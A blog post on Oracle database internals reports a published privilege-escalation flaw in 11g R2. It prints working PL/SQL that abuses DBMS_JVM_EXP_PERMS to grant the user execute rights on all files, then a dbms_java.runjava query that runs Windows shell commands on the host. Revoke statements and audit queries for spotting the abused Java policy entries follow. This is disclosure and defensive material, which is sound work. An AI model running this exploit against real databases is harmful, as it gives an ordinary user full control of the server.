Oraclue

Oracle internals, debugging and undocumented features

Oracle Exploit Published 11g R2

Just found this alert.

Credit goes to David Litchfield. He found these vulnerabilities. This also affects 11g R2.

Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database.

Basically, using DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS, a user can change their own privileges in the Java policy table so that the JVM allows them to execute operating system commands and to read and write files.

Here is the code:

DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM dual;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;

Oracle does not have a patch for it yet, but you should revoke privileges from PUBLIC for the following packages:

revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from public;
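
To confirm the revokes took effect and to look for Java policy entries of the kind described above, the following audit queries can be run from a DBA account. This is an added example, not part of the original post; it assumes read access to the DBA_TAB_PRIVS and DBA_JAVA_POLICY dictionary views.

```sql
-- Added audit example (not from the original post). Run as a DBA.

-- 1. PUBLIC should no longer hold EXECUTE on the three packages.
--    Expect no rows once the revokes above have been applied.
SELECT grantee, owner, table_name, privilege
FROM   dba_tab_privs
WHERE  grantee    = 'PUBLIC'
AND    privilege  = 'EXECUTE'
AND    table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA', 'DBMS_JAVA_TEST');

-- 2. Who else can still execute these packages, and who granted it?
--    Every row here should map to an account with a documented need.
SELECT grantee, table_name, grantor
FROM   dba_tab_privs
WHERE  privilege  = 'EXECUTE'
AND    grantee   <> 'PUBLIC'
AND    table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA', 'DBMS_JAVA_TEST')
ORDER  BY table_name, grantee;

-- 3. Enabled Java policy entries that grant "execute" on <<ALL FILES>>.
--    This is the permission the post describes being imported into the
--    policy table; review each grantee and disable entries that are
--    not expected.
SELECT grantee, kind, type_schema, type_name, name, action, enabled, seq
FROM   dba_java_policy
WHERE  kind      = 'GRANT'
AND    enabled   = 'ENABLED'
AND    type_name = 'java.io.FilePermission'
AND    name      = '<<ALL FILES>>'
AND    LOWER(action) LIKE '%execute%'
ORDER  BY grantee, seq;
```

Application code that relies on DBMS_JAVA through the PUBLIC grant will break after the revoke, so query 2 is also a useful inventory of accounts that need an explicit grant.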

5 responses to “Oracle Exploit Published 11g R2”

  1. Michael O'Neill February 5, 2010 at 10:21 pm

    Java Bad (waves arms slowly and awkwardly at imaginary flames).
